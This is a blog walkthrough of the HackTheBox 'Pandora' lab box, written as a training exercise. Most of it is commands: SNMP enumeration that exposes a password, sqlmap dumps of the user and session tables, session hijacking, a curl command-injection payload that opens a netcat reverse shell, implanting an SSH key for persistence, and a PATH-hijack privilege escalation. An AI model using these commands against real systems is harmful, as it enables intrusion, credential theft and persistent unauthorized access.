Pandora HackTheBox WalkThrough

Pandora HackTheBox banner

This is Pandora HackTheBox machine walkthrough. In this writeup, I have demonstrated step-by-step how I rooted Pandora HackTheBox machine. Before starting let us know something about this machine. It is Linux OS box with IP address and difficulty easy assigned by its maker.

First of all, connect your PC with HackTheBox VPN and make sure your connectivity with Pandora machine by pinging its IP If all goes correct then start hacking. As usual, I started by scanning the machine. Scanning gives us an idea how we have to proceed further. Like, it helps in banner grabbing the services running over different ports and sometimes it helps in vulnerability assessment also. I have used $ nmap for this task and the result is given below: –


$ sudo nmap -p- -oN full-tcp-scan.nmap --min-rate=10000
TCP Full port scan on Pandora HTB during its walkthrough
$ sudo nmap -p22,80 -oN script-scan.nmap -sC -sV
Script scan on Pandora HTB on TCP Ports
$ sudo nmap --top-ports 10 -sU -oN top-udp.nmap
Port scan on top 10 UDP ports on Pandora  HTB
$ sudo nmap -p161 -sU -sC -sV -T4 -oN udp-script.nmap
Script scan on UDP port 161 on Pandora  HTB


Nmap full TCP scan revealed ports 22 and 80 as open. OpenSSH is running over port 22 and apache2 web server is running over port 80. Also, UDP scan on top 10 ports revealed port 161 as open and SNMP service is running over it. SNMP is bit unique let us explore over it.

Wikipedia, describes Simple Network Management Protocol (SNMP) as an Internet Standard protocol for collecting and organizing information about managed devices on IP networks and for modifying that information to change device behavior. It is widely used in network management for network monitoring. It exposes management data in the form of variables on the managed systems organized in a Management Information Base (MIB) which describes the system status and configuration.

Enumeration on Port 161

On further enumeration on port 161 using nmap's snmp scripts found credential daniel : HotelBabylon23.

$ sudo nmap -sU -p161 --script “snmp* and not snmp-brute”
SNMP Enumeration using nmap script during Pandora HackTheBox WalkThrough -Part 1


SNMP Enumeration using nmap script during Pandora HackTheBox WalkThrough -Part 2


SNMP Enumeration using nmap script during Pandora HackTheBox WalkThrough -Part 3

You can also use metasploit’s auxiliary module auxiliary/scanner/snmp/snmp_enum for SNMP enumeration. It also performs the same task as nmap’s snmp scripts do.

msf6 > use auxiliary/scanner/snmp/snmp_enum
msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS
msf6 auxiliary(scanner/snmp/snmp_enum) > run
SNMP Enumeration using metasploit auxiliary module on Pandora HTB-Part 1


SNMP Enumeration using metasploit auxiliary module on Pandora HTB-Part 2


Let us use this [daniel: HotelBabylon23] credential to SSH into the pandora box.

Getting User Shell

$ ssh [email protected]
$ whoami && id
SSH into Daniel account during Pandora HackTheBox WalkThrough

We have successfully logged in into Pandora box as user daniel. It has two users namely daniel & matt. User flag is only accessible to matt and root user therefore, when I tried to access it, it gave me Access Denied message. To capture the flag, we have to logged in as user matt. After some enumeration when I didn’t find anything interesting then simply checked all the listening ports on pandora box.

Checking the Listening Ports

$ ss -lnpt
Listening ports on Pandora HTB

Port number 53, 22, 3306 and 80 are listening. Ports 80 and 22 are listening as normal [because they can be accessed from outside the box]. On the other hand, ports 3306 & 53 are only accessible from localhost. Since we don’t have any credential so we can’t access them. I simply curled the IP and found a URI /pandora_console/. This hinted me to check the URL When I checked it, I found different content which was not accessible through the URL

$ curl
Curl Command result

To access this Pandora Console, we have to port forward port number 80 to our localhost [kali machine]. Since we have SSH credentials so can use it to perform local port forwarding.

Local Port Forwarding

$ ssh -L 80: [email protected]
Local Port Forwarding during Pandora HackTheBox WalkThrough

After localport forwarding pandora_console is accessible through the URL

Pandora Console Web Interface

Tried to login with Pandora FMS default credential admin : pandora and with some other combination of credentials but none of them worked. There is also the version of this FMS is present viz., v7.0NG.742_FIX_PERL2020.

Pandora FMS version details

Simply googled this version for vulnerabilities and found it is affected with many vulnerabilities namely SQL Injection, Malicious File Execution, Privilege Escalation, XSS and a lot more. Check articles this & this for more info. SQL Injection can be confirmed by the endpoint\.

SQL Injection PoC reproduced during Pandora HackTheBox Walkthrough

Soon I got this vulnerability I dumped the Username and Password of all the users.

$ sqlmap -u --dbs --batch --technique=EU --time-sec=30
$ sqlmap -u -D pandora -T tusuario -C fullname,is_admin,password,email --dump --thread=10
Dumping tusuario table on screen

Then tried to crack the hash using $ hashcat and wordlist rockyou.txt but it could not crack them. Then I dumped the session IDs of all the logged in user from the table tsessions_php and hijacked the session of user matt.

$ sqlmap -u -D pandora --dbms=mysql -T tsessions_php --dump --thread=10 --risk=3
Dumping tssession_php table on screen


Hijacking Session of Matt

Simply replace the PHPSESSID value with g80h3hf7j4u3js38pchlm445kn and then refresh the page. We can see we have successfully hijacked the session of matt and logged in successfully as matt.

Session Hijacking on Pandora HTB

Getting Shell as Matt

According to this post we can perform Remote Command Execution via the Events Feature.

Note: If we are getting user shell here then it will be of the privilege of the user matt because currently, we are logged in as matt.

Let us exploit and get user shell using the PoC given in this post.

On Kali Machine

$ curl -H "Cookie: PHPSESSID=g80h3hf7j4u3js38pchlm445kn" "|sh+-i+2%3E%261|nc+"

On Local Machine

$ nc -nvlp 1234
$ whoami && id
Getting user shell as matt on Pandora HTB

We have successfully got user shell with the privilege of user matt. Let us upgrade it to fully qualified Linux shell so that we can run more advanced Linux command through it.

Note: You will get access denied message as below if Session ID of matt user is expired. So, try to dump fresh session id from tsessions_php table and then use it to hijack matt’s session.

Unauthorized Access Error

Upgrading Shell

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ ^Z # Ctrl+Z to background the shell
$ stty raw -echo
$ fg # Plus press 2 times enter to foreground the shell
$ export TERM=xterm
Upgrading user shell in Pandora HTB

We have successfully upgraded the shell. Let us capture user flag.

Capture User Flag

$ cat /home/matt/user.txt
Capturing user flag during Pandora HackTheBox walkthrough

Privilege Escalation

To escalate the privilege to root we have to first find a Privilege Escalation Vector using which we can perform privilege escalation. We can find PrivEsc Vector either manually or using some post exploitation enumeration scripts like, and there are a lot more. Check this link on PayloadsAllTheThings. This time, I have used for this task.

Finding PrivEsc Vector found a custom SUID binary pandora_backup in the directory /usr/bin/. SUID binary is that file which when executed by normal user is executed by the permission of its owner even if it is not owned by the normal user. For example, if any binary has given a SUID permission and that file is owned by root user so, when normal user executes that binary all the commands inside that file will be executed by root privilege.

Linpeas result showing SUID binary on Pandora HackTheBox walkthrough

Let us check who can execute pandora_backup by checking its permission.

$ ls -la /usr/bin/pandora_backup
Checking the permission of pandora_backup SUID binary

pandora_backup has executable permission given to user matt. This binary can be used to escalate privilege by Path Hijacking if the Linux commands used inside this binary is not used with their absolute path. Let us check whether any Linux command is being used without its absolute path inside pandora_backup.

$ cat /usr/bin/pandora_backup
Checking the Content of pandora_backup file during Pandora HackTheBox walkthrough

We found that $ tar command is used without its absolute path. We can use $ tar command to exploit this vulnerability and get root shell. When I tried to get shell by manipulating $ tar command I got root shell without much effort. So here our potential PrivEsc Vector is Privilege Escalation by Path Hijacking or Privilege Escalation by Custom SUID exploitation. Check HTB boxes with similar privilege escalation vector here and here.

Before privilege escalation we need to first get a persistent shell using SSH, only then our exploit will work. I don’t know why but when I was trying to get root using this current shell I got failed every time. This exploit worked only when I got a SSH shell of user matt by implanting my SSH public key in authorized_keys file of user matt. So let us implant our SSH public key into authorized_keys file.

Implanting SSH Keys

On Kali Machine

$ ssh-keygen # generate new ssh key pair
$ cat
Generating SSH Key pair during Pandora HackTheBox walkthrough

Copy keys in your clipboard and then paste it into authorized_keys file of user matt. If authorized_keys find not present then create one as below.

On Pandora Machine

$ mkdir .ssh
$ cd .ssh/
$ echo "Your SSH public key here" >authorized_keys
$ cat authorized_keys
Pasting my SSH public key to matt authorized_keys file

Getting Shell as Matt

$ chmod 400 id_rsa
$ ssh -i id_rsa [email protected]
$ whoami && id
Getting ssh shell of User Matt

We have successfully got a persistence shell of user matt. Let us get root shell by performing privilege escalation.

Getting Root Shell

To get root shell do the following.

$ cd /tmp
$ echo "/bin/bash" > tar
$ export PATH=$(pwd):$PATH
$ chmod +x tar
$ /usr/bin/pandora_backup
# whoami && id
Privilege Escalation in Pandora HackTheBox WalkThrough

We have successfully got root shell. let us capture root flag.

Capture Root Flag

# cat /root/root.txt
Capturing root flag during Pandora HackTheBox WalkThrough

This was how I rooted to Pandora HackTheBox machine. Learnt a lot during this walkthrough. Hope you have also learnt some new things. Thanks for reading this writeup. Share your experience in the comment section. Want to give any suggestion about the writeup feel free to write us at [email protected]. Check out my latest articles at

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of I am InfoSec Consultant in day and Bug Bounty Hunter & CTF player at night. Sometimes write walkthrough and other cyber security articles here. You can connect me at